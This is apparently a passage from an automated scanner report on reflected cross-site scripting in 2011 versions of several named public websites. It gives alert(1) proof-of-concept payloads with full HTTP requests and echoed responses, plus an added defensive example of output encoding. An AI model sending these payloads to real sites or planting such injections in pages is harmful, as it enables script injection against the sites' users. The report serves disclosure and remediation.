<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php92343"-alert(1)-"ebb68879ffc"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7efed<script>alert(1)</script>ee0d16265bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php7efed<script>alert(1)</script>ee0d16265bf HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sat, 05 Feb 2011 15:52:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=cs8kb2m53v021g3mbm8btac024; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1523
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php7efed<script>alert(1)</script>ee0d16265bf</strong> ...[SNIP]...
4.113. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.addthis.com
Path: /bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19497"-alert(1)-"fe14a7cf82e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/19497"-alert(1)-"fe14a7cf82e HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:52:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 93974
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/19497"-alert(1)-"fe14a7cf82e"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of the v request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29706"style%3d"x%3aexpression(alert(1))"3fa85094d5c was submitted in the v parameter. This input was echoed as 29706"style="x:expression(alert(1))"3fa85094d5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=2029706"style%3d"x%3aexpression(alert(1))"3fa85094d5c HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:52:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 93991
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="source" name="source" value="bkm-2029706"style="x:expression(alert(1))"3fa85094d5c" /> ...[SNIP]...
4.115. http://www.brinked.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.brinked.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35421"><script>alert(1)</script>01d4208af54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?35421"><script>alert(1)</script>01d4208af54=1 HTTP/1.1
Host: www.brinked.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <input type="hidden" name="url" value="../?35421"><script>alert(1)</script>01d4208af54=1" /> ...[SNIP]...
4.116. http://www.brinked.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.brinked.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0e8d</script><script>alert(1)</script>164da3fbd1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?f0e8d</script><script>alert(1)</script>164da3fbd1b=1 HTTP/1.1
Host: www.brinked.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4f2f"><script>alert(1)</script>42a734dfe42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsd4f2f"><script>alert(1)</script>42a734dfe42/software/hosted/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 15:26:42 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:26:42 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=SOVVIITHY30MLQE1GHOSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32887
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/newsd4f2f"><script>alert(1)</script>42a734dfe42/software/h;kvarticleid=;kvauthor=;loc=300;grp=285504902" target="_blank"> ...[SNIP]...
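The findings that land in HTML rather than script context (text inside the title element, the `value` and `href` attributes, and the case-varied `</ScRiPt >` that walked past a keyword filter) are all fixed by the same output-encoding step. As an added example, not code from any of the scanned sites, the following contrasts the kind of blacklist the report describes with context-aware encoding, and includes two small checks that approximate how a browser tokenises the result. Function names, the sample markup and the inputs are illustrative constructions modelled on the payloads above.

```javascript
// Added example, not the scanned sites' code. Names and markup are illustrative.

// The kind of filter the report calls a blacklist: strip one spelling of the
// tag. HTML tag names are case-insensitive, so "<ScRiPt>" sails through, as do
// "<script >", "<svg onload=...>" and everything else not on the list.
function blacklistFilter(value) {
  return String(value).replace(/<script>/g, "").replace(/<\/script>/g, "");
}

// Output encoding for HTML text and double-quoted attribute values. Encoding
// these five characters makes it impossible for the data to close the current
// element or attribute, whatever the letter case or spelling of the payload.
function encodeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Two sinks from the report: text inside <title>, and a hidden input's value.
function renderVulnerable(title, source) {
  return '<title>' + title + '</title>\n' +
    '<input type="hidden" id="source" name="source" value="bkm-' + source + '" />';
}

function renderHardened(title, source) {
  return '<title>' + encodeHtml(title) + '</title>\n' +
    '<input type="hidden" id="source" name="source" value="bkm-' + encodeHtml(source) + '" />';
}

// Check 1: does a script element start anywhere in the markup? Case-insensitive,
// like the browser's tokenizer; "<script>" and "<ScRiPt >" both match.
function containsScriptElement(html) {
  return /<script[\s>]/i.test(html);
}

// Check 2: which attributes end up on the <input>? A browser reading
// value="a"style="..." starts a new attribute at "style" even without a space,
// so any name beyond the four we wrote means the value broke out.
function inputAttributeNames(html) {
  const tag = html.match(/<input\b([^>]*)>/);
  if (!tag) return [];
  return Array.from(tag[1].matchAll(/([\w-]+)="[^"]*"/g), (m) => m[1]);
}

function demo() {
  // Constructed inputs modelled on the report's payloads.
  const caseVaried = '779b5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>41504730d2c';
  const titleBreak = 'Wiki1ace3</title><script>alert(1)</script>ae207730a4d';
  const styleBreak = '2029706"style="x:expression(alert(1))"3fa85094d5c';
  return {
    filterBypassed: containsScriptElement(blacklistFilter(caseVaried)),
    vulnerableTitle: containsScriptElement(renderVulnerable(titleBreak, "20")),
    hardenedTitle: containsScriptElement(renderHardened(titleBreak, "20")),
    vulnerableAttrs: inputAttributeNames(renderVulnerable("t", styleBreak)),
    hardenedAttrs: inputAttributeNames(renderHardened("t", styleBreak)),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The `style="x:expression(...)"` payload only executes in old Internet Explorer, as the report notes, but `inputAttributeNames` shows the part that matters in every browser: the value closed its attribute and started a new one, so any attribute the browser honours (`onfocus`, `autofocus`, a new `src`) is reachable. The blacklist fails not because the list is too short but because it inspects the input instead of encoding for the output context; the hardened renderer needs no list at all. Encoding with `encodeHtml` is correct for element text and quoted attribute values only; URL-valued attributes such as the `href` in the finding above additionally need the value validated as a URL, and a script context needs the literal serialisation shown in the earlier example rather than HTML encoding.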
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf881'-alert(1)-'c7d0e430718 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsbf881'-alert(1)-'c7d0e430718/software/hosted/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 15:26:43 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:26:43 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=E5L45LDGRZA11QE1GHPCKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32837
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/newsbf881'-alert(1)-'c7d0e430718/software/hosted/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=945734015;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6465'-alert(1)-'291f947bd70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/softwaref6465'-alert(1)-'291f947bd70/hosted/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 15:26:45 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:26:45 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=RD2TG501O4YWPQE1GHRSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32358
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/softwaref6465'-alert(1)-'291f947bd70/hosted/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=389734246;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dab8a"><script>alert(1)</script>b614631af52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/softwaredab8a"><script>alert(1)</script>b614631af52/hosted/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 15:26:45 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:26:45 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=J03AGR31Q5PQNQE1GHOSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32408
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/softwaredab8a"><script>alert(1)</script>b614631af52/h;kvarticleid=;kvauthor=;loc=300;grp=731813626" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dc63'-alert(1)-'4490bf86c41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/software/hosted5dc63'-alert(1)-'4490bf86c41/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 15:26:49 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:26:49 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=VBUYZEOB41MHPQE1GHPSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32813
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/news/software/hosted5dc63'-alert(1)-'4490bf86c41/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=173128278;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc0b8"><a%20b%3dc>325da676732 was submitted in the REST URL parameter 3. This input was echoed as cc0b8"><a b=c>325da676732 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/software/hostedcc0b8"><a%20b%3dc>325da676732/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 15:26:47 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:26:47 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=4DWIFQDDRQC2LQE1GHPSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32815
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/news/software/hostedcc0b8"><a b=c>325da676732/showArticle;kvarticleid=;kvauthor=;loc=300;grp=695609622" target="_blank"> ...[SNIP]...
The value of the articleID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6576"><script>alert(1)</script>cebc826cf51 was submitted in the articleID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/software/hosted/showArticle.jhtml?articleID=225700573b6576"><script>alert(1)</script>cebc826cf51&subSection=Hosted+Software HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 15:26:52 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:26:52 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=AO4VIN1V3MUUNQE1GHPCKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 34103
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <link rel="canonical" href="http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576"><script>alert(1)</script>cebc826cf51"/> ...[SNIP]...
The value of the articleID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fbfd'%3balert(1)//94414a05705 was submitted in the articleID parameter. This input was echoed as 6fbfd';alert(1)//94414a05705 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/software/hosted/showArticle.jhtml?articleID=2257005736fbfd'%3balert(1)//94414a05705&subSection=Hosted+Software HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 15:26:53 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:26:53 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=WB0PTHRLAGQ1PQE1GHRSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 33678
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=2257005736fbfd';alert(1)//94414a05705+/news/software/hosted/showArticle/dhandler;kvarticleid=2257005736fbfd';alert(1)//94414a05705;kvauthor=;loc=100;target=_blank;grp=919541144;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1a16<a>c35b1c1308c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /p-c0xFC9HiPwWw-f1a16<a>c35b1c1308c HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Sat, 05 Feb 2011 16:11:36 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <em> p-c0xFC9HiPwWw-f1a16<a>c35b1c1308c</em> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70e07"><a>827f9aea977 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /p-c0xFC9HiPwWw-70e07"><a>827f9aea977 HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Sat, 05 Feb 2011 16:11:34 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
4.127. http://www.rackspace.com/blog/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /blog/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3df87"><script>alert(1)</script>8c3dc7536d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3df87\"><script>alert(1)</script>8c3dc7536d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/?3df87"><script>alert(1)</script>8c3dc7536d=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... age-chatinvite-wrap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/blog/?3df87\"><script>alert(1)</script>8c3dc7536d=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a423706ce3acae18c89','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.128. http://www.rackspace.com/blogs/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /blogs/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32034"><script>alert(1)</script>0aa11522d95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/index.php?32034"><script>alert(1)</script>0aa11522d95=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
